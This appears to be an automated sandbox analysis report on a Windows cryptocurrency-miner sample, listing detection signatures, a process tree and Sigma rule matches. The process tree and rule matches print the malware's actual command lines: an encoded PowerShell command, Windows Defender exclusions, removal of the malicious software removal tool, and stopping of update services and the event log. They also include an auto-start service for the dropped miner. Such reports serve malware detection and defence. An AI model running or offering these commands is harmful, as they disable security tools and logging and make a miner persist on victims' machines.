
Windows Analysis Report
kx new.exe

Overview

General Information

Sample name: kx new.exe
Analysis ID: 1585415
MD5: d9d13fa25e880665fb471a4be57c494c
SHA1: 7a4c1b09a9d37ff55872544a39a2cc5f0eec9523
SHA256: 632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7
Tags: CoinMiner, exe, user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • kx new.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)
    • powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Kawpow new.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)
      • powershell.exe (PID: 7644 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 1148 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8076 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1304 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3340 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1984 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2508 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3712 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4524 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6908 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 4032 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • sc.exe (PID: 3068 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7684 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7472 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7436 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmr new.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
      • powershell.exe (PID: 7736 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7796 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 768 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8108 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1568 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2168 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2288 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3020 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1012 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 5216 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 2788 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • sc.exe (PID: 7180 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7628 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7588 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7536 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eejhedztifcv.exe (PID: 7604 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: 7D6398EBFB82A24748617189BF4AD691)
  • cleanup
No configs have been found
No yara matches

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3712, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7644, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 4032, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 7684, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kx new.exe", ParentImage: C:\Users\user\Desktop\kx new.exe, ParentProcessId: 7428, ParentProcessName: kx new.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=", ProcessId: 7512, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7556, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7472, ProcessName: sc.exe
No Suricata rule has matched


AV Detection

Source: kx new.exe | Avira: detected
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | ReversingLabs: Detection: 73%
Source: kx new.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: kx new.exe | Joe Sandbox ML: detected
Source: kx new.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Binary string: T].PdBB?0_$u3J~7 | source: kx new.exe, 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp, kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmp
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CF9DCE0 FindFirstFileExW,10_2_000002534CF9DCE0
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E99175DCE0 FindFirstFileExW,59_2_000002E99175DCE0
Source: C:\Windows\System32\lsass.exe | Code function: 73_2_00000213BDCEDCE0 FindFirstFileExW,73_2_00000213BDCEDCE0
Source: C:\Windows\System32\svchost.exe | Code function: 74_2_00000158709DDCE0 FindFirstFileExW,74_2_00000158709DDCE0
Source: C:\Windows\System32\dwm.exe | Code function: 75_2_0000026DB167DCE0 FindFirstFileExW,75_2_0000026DB167DCE0
Source: powershell.exe, 00000002.00000002.1493135333.000000000870A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftT
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester

System Summary

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
